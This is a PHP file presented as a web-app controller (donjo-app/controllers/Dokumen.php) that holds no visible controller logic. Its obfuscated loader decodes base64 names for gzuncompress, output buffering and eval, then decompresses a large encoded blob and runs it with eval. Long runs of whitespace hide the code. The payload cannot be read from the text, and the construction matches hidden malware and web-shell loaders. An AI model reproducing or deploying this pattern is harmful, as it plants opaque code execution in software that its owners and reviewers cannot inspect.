<?php 
        $__='printf';$_='Loading donjo-app/controllers/Dokumen.php';
        







































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






































































































































































































































                                                                                                                                                                                                                     $________;
